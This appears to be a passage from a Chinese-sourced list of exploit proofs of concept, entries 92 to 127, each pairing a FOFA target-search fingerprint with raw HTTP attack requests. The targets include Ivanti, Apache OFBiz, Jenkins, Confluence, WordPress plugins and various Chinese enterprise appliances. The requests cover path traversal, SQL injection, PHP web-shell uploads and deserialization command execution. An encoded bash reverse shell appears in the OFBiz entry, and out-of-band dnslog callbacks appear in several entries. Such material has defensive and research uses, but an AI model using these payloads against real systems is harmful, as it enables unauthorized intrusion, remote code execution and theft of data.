GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Two traversals in one request: the ..;/ segment is a Tomcat path parameter that the container normalizes away, so the request passes the access check for /center/api/task/ yet is routed to /center/orgManage/...; the fileName parameter then walks up to /etc/passwd.



92. Hikvision operation management center session command execution
Fastjson deserialization command execution; the PoC passes its test command in the Testcmd header.
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. Qi An Xin Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The upload is stored under /attachements/ with its original name. Verify:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:SignedInfo>
            <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
            <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
        </ds:SignedInfo>
        <<ds:SignatureValue>qwerty</ds:SignatureValue>
        <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
        </ds:KeyInfo>
        <ds:Object></ds:Object>
    </ds:Signature>
</soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg settings information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php.

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. 北京百绰 Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰 Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
